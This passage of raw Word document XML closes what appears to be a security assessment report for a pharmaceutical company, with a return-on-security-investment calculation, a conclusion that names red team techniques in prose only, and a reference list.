        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B53CEB">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>RAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = £2,250,000 - £450,000 = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>£1,800,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B25D8" w14:textId="77777777" w:rsidR="0044735A" w:rsidRPr="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044735A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Return on Security Investment (ROSI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3957A93C" w14:textId="77777777" w:rsidR="0044735A" w:rsidRPr="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">ROSI = </w:t>
      </w:r>
      <m:oMath>
        <m:f>
          <m:fPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:sz w:val="56"/>
              </w:rPr>
            </m:ctrlPr>
          </m:fPr>
          <m:num>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <m:t>B-C</m:t>
            </m:r>
          </m:num>
          <m:den>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <m:t>C</m:t>
            </m:r>
          </m:den>
        </m:f>
      </m:oMath>
    </w:p>
    <w:p w14:paraId="73042D7F" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02526504" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B (Annual Savings/Benefits) = £1,800,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9F1F1" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C (Total Annual Investment Cost) = £400,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C379D3" w14:textId="77777777" w:rsidR="0034449E" w:rsidRDefault="0034449E" w:rsidP="0034449E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E258B3D" w14:textId="77777777" w:rsidR="0044735A" w:rsidRPr="0034449E" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0034449E">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ROSI = </w:t>
      </w:r>
      <m:oMath>
        <m:f>
          <m:fPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </m:ctrlPr>
          </m:fPr>
          <m:num>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <m:t>1,800,000-400,000</m:t>
            </m:r>
          </m:num>
          <m:den>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <m:t>400,000</m:t>
            </m:r>
          </m:den>
        </m:f>
      </m:oMath>
      <w:r w:rsidRPr="0034449E">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <m:oMath>
        <m:f>
          <m:fPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </m:ctrlPr>
          </m:fPr>
          <m:num>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <m:t>1,400,000</m:t>
            </m:r>
          </m:num>
          <m:den>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <m:t>400,000</m:t>
            </m:r>
          </m:den>
        </m:f>
      </m:oMath>
      <w:r w:rsidRPr="0034449E">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0034449E" w:rsidRPr="0034449E">
        <w:rPr>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>≈ 3.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715B791A" w14:textId="77777777" w:rsidR="0044735A" w:rsidRDefault="0044735A" w:rsidP="0044735A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D41C165" w14:textId="77777777" w:rsidR="0034449E" w:rsidRDefault="0044735A" w:rsidP="0034449E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="0034449E">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="0034449E">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C5DDE" w:rsidRPr="006C5DDE">
        <w:t>The process to calculate ROSI of 350% demonstrates that for every £1 investment in the proposed strategic security controls, CPC yields a return of £3.50 in avoided loss. This massive return clearly justifies the immediate investment of £400,000 to protect assets valued at £15,000,000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622421CC" w14:textId="77777777" w:rsidR="00141FDA" w:rsidRDefault="00141FDA" w:rsidP="0034449E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F31704B" w14:textId="77777777" w:rsidR="00BE304D" w:rsidRDefault="00BE304D" w:rsidP="0034449E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46ADB746" w14:textId="77777777" w:rsidR="00042D54" w:rsidRDefault="00042D54" w:rsidP="00042D54">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc215571142"/>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="115CE3F4" w14:textId="033FD9DE" w:rsidR="007609F0" w:rsidRDefault="006C5DDE" w:rsidP="0034449E">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve">This assessment has successfully provided both a strategic, high-level analysis of real-world threats and a practical, technically rigorous simulation of an APT campaign. The Strategic way of Threat Analysis identified critical architectural and control failures in the pharmaceutical sector, mapped directly to MITRE ATT&amp;CK TTPs </w:t>
      </w:r>
      <w:hyperlink w:anchor="First" w:history="1">
        <w:r w:rsidRPr="00AA64D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[1],</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> and grounded the root cause analysis in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007609F0">
        <w:t>organisational</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> and compliance contexts. The "Operation IP Shield" Red Team engagement demonstrated that even a hybrid environment with existing controls can be successfully compromised through chained vulnerabilities (UAC bypass, LSASS dumping) </w:t>
      </w:r>
      <w:hyperlink w:anchor="third" w:history="1">
        <w:r w:rsidRPr="00E20BB1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[3],</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> poor credential hygiene (plaintext keys), and a lack of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007609F0">
        <w:t>behavioural</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> logging. The most critical failing was the ability to pivot to the cloud and establish a new access key silently</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="fourth" w:history="1">
        <w:r w:rsidRPr="008D73C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[4].</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> The reports and the </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve">Cost-Benefit Analysis provide a clear roadmap for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C5DDE">
        <w:t>Cureton</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> Pharmaceutical Company's executive leadership to justify a critical investment in advanced EDR, PAM, CSPM, and Zero Trust architecture to prevent future catastrophic IP loss. The demonstrated TTPs confirm that security must evolve from a perimeter-focused model to a Zero Trust, identity-centric, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007609F0">
        <w:t>behavioural</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007609F0">
        <w:t>-detection</w:t>
      </w:r>
      <w:r w:rsidRPr="006C5DDE">
        <w:t xml:space="preserve"> model to achieve Level 7 resilience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB29DE" w14:textId="7610F9CC" w:rsidR="006420AB" w:rsidRDefault="007609F0" w:rsidP="007609F0">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="19" w:name="_Toc215571143" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="193890458"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="33A1D438" w14:textId="77777777" w:rsidR="006420AB" w:rsidRDefault="006420AB">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r>
            <w:t>References</w:t>
          </w:r>
          <w:bookmarkEnd w:id="19"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="696BEB45" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="006420AB" w:rsidP="00804415">
              <w:pPr>
                <w:jc w:val="both"/>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9"/>
                <w:gridCol w:w="9001"/>
              </w:tblGrid>
              <w:tr w:rsidR="00C1637B" w14:paraId="6D2A94DD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1093671897"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="65B85E57" w14:textId="3B8B4892" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:bookmarkStart w:id="20" w:name="First" w:colFirst="1" w:colLast="1"/>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6D082970" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>MITRE Engenuity, "MITRE ATT&amp;CK®," MITRE, [Online]. Available: https://attack.mitre.org. [Accessed 20 11 2025].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00C1637B" w14:paraId="73816716" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1093671897"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="159DC0C6" w14:textId="1EF26182" w:rsidR="00C1637B" w:rsidRDefault="007A16D1">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:bookmarkStart w:id="21" w:name="second" w:colFirst="0" w:colLast="1"/>
                    <w:bookmarkEnd w:id="20"/>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>s</w:t>
                    </w:r>
                    <w:r w:rsidR="00C1637B">
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5FF9215A" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mandiant, "Mandiant Threat Intelligence," M-Trends 2023: A Shift in the Cyber Threat Landscape, 04 2023. [Online]. Available: https://www.mandiant.com/resources/m-trends-2023. [Accessed 20 11 2025].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00C1637B" w14:paraId="43B28A12" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1093671897"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="465CBEB0" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:bookmarkStart w:id="22" w:name="third"/>
                    <w:bookmarkEnd w:id="21"/>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6F0C3DFA" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>e. a. Scott Rose, "Zero Trust Architecture," National Institute of Standards and Technology (NIST), August 2020.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00C1637B" w14:paraId="78D61416" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1093671897"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="33679DE5" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:bookmarkStart w:id="23" w:name="fourth" w:colFirst="1" w:colLast="1"/>
                    <w:bookmarkEnd w:id="22"/>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="29212D5D" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>P. T. Board, "The Penetration Testing Execution Standard," Penetration Testing Execution Standard, [Online]. Available: http://www.pentest-standard.org/. [Accessed 20 11 2025].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:bookmarkEnd w:id="23"/>
              <w:tr w:rsidR="00C1637B" w14:paraId="07742164" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1093671897"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="47CD7EE3" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="31899DB6" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:bookmarkStart w:id="24" w:name="fifth"/>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>N. I. o. S. a. T. (NIST), "Framework for Improving Critical Infrastructure Cybersecurity (CSF)," U.S. Department of Commerce, 2018. [Online]. Available: https://www.nist.gov/cyberframework</w:t>
                    </w:r>
                    <w:bookmarkEnd w:id="24"/>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00C1637B" w14:paraId="2C44CBE8" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1093671897"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0D31BDBE" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:bookmarkStart w:id="25" w:name="sixth" w:colFirst="1" w:colLast="1"/>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4848CF48" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">G. S. G. K. A. S. A. K. G. V. V. N. B. Ranga, "Ethical Hacking and Security Audit," </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Journal of Computer Science and Network Security (IJCSNS), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Vols. Vol. 9, No. 6, pp. 240-244, pp. 240-244, June,2009. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:bookmarkEnd w:id="25"/>
            </w:tbl>
            <w:p w14:paraId="664F5972" w14:textId="77777777" w:rsidR="00C1637B" w:rsidRDefault="00C1637B">
              <w:pPr>
                <w:divId w:val="1093671897"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="659605FC" w14:textId="77777777" w:rsidR="006420AB" w:rsidRDefault="006420AB" w:rsidP="00804415">
              <w:pPr>
                <w:jc w:val="both"/>
              </w:pPr>
              <w:r>
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:noProof/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="47708A42" w14:textId="77777777" w:rsidR="00592954" w:rsidRPr="00592954" w:rsidRDefault="00592954" w:rsidP="00592954">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4374ED87" w14:textId="77777777" w:rsidR="00671BC6" w:rsidRPr="00285046" w:rsidRDefault="00671BC6" w:rsidP="00456084"/>
    <w:sectPr w:rsidR="00671BC6" w:rsidRPr="00285046">
      <w:footerReference w:type="default" r:id="rId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46FDBD" w14:textId="77777777" w:rsidR="00FA1A6B" w:rsidRDefault="00FA1A6B" w:rsidP="00F7143D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="07961E88" w14:textId="77777777" w:rsidR="00FA1A6B" w:rsidRDefault="00FA1A6B" w:rsidP="00F714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AF26B8" w14:textId="77777777" w:rsidR="00701604" w:rsidRDefault="00701604" w:rsidP="00DB1C6E">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8719024"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="18674A26" w14:textId="77777777" w:rsidR="00701604" w:rsidRDefault="00701604">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
        <w:r>
          <w:t xml:space="preserve">Page | </w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="006508B8">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="4D9451B2" w14:textId="77777777" w:rsidR="00701604" w:rsidRDefault="007016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DE6541" w14:textId="77777777" w:rsidR="00FA1A6B" w:rsidRDefault="00FA1A6B" w:rsidP="00F7143D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="36954B34" w14:textId="77777777" w:rsidR="00FA1A6B" w:rsidRDefault="00FA1A6B" w:rsidP="00F7143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358A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8842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38546E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B274C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F96E9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDD87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3F4184"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BD25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575C0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B029A1A"/>
    <w:lvl w:ilvl="0" w:tplc="5F7A53E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6C10FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE2AB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4F4E19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9014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0872BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B198C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FA3509"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A12CC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787356"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D88E6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D1D09B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37227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601DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D523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C933A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB28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9833F9E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B05404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C392F2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40741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44275B3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CAEF0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5937463"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="79D6A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C33B78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DF4D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D1F1C3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56DCA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08278D1"/>
